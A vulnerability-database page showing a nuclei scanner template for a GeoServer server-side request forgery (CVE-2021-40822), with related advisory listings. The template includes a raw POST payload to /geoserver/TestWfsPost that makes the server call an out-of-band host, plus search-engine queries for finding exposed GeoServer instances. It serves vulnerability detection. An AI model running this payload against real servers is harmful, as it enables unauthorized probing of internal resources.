Lucene search
K

Geoserver - Server-Side Request Forgery

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

GeoServer SSRF via proxy host setting, impacts unauthorized access & data leakage. CVE-2021-4082

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-40822
2 May 202200:15
attackerkb
Circl
CVE-2021-40822
2 May 202207:27
circl
CNNVD
GeoServer 代码问题漏洞
2 May 202200:00
cnnvd
CVE
CVE-2021-40822
1 May 202223:17
cve
Cvelist
CVE-2021-40822
1 May 202223:17
cvelist
EUVD
EUVD-2024-26218
3 Oct 202520:07
euvd
Github Security Blog
GeoServer allows SSRF via the option for setting a proxy host
3 May 202200:00
github
NVD
CVE-2021-40822
2 May 202200:15
nvd
OSV
GHSA-5GW5-JCCF-6HXW GeoServer Vulnerable to Unauthenticated SSRF via TestWfsPost
10 Jun 202514:13
osv
OSV
GHSA-RR33-J5P5-PPF8 GeoServer allows SSRF via the option for setting a proxy host
3 May 202200:00
osv
Rows per page
id: CVE-2021-40822

info:
  name: Geoserver - Server-Side Request Forgery
  author: For3stCo1d,aringo-bf
  severity: high
  description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability.
  reference:
    - https://gccybermonks.com/posts/cve-2021-40822/
    - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
    - https://github.com/geoserver/geoserver/releases
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40822
    - https://osgeo-org.atlassian.net/browse/GEOS-10229
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-40822
    cwe-id: CWE-918
    epss-score: 0.18925
    epss-percentile: 0.9696
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"GeoServer"
      - http.title:"geoserver"
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
      - title="geoserver"
    google-query: intitle:"geoserver"
  tags: cve2021,cve,ssrf,geoserver,osgeo,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/geoserver/"

    stop-at-first-match: true
    redirects: true
    max-redirects: 3
    matchers:
      - type: word
        part: body
        words:
          - "geoserver.web"
          - "geoserverbasepage"
          - "GeoServer: Redirecting"
        internal: true
        case-insensitive: true

  - raw:
      - |
        POST /geoserver/TestWfsPost HTTP/1.1
        Host: oast.pro
        Content-Type: application/x-www-form-urlencoded

        form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<b>Interactsh</b>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022006f988d05fddf38369a7c03897c51188d22c90d9b748dbd1cb7a0e2062dd25bd022041ce29fa50acd35db0e352844ae647652141a38c68b57a9ebc104e6c0f6ad6a2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.18925
41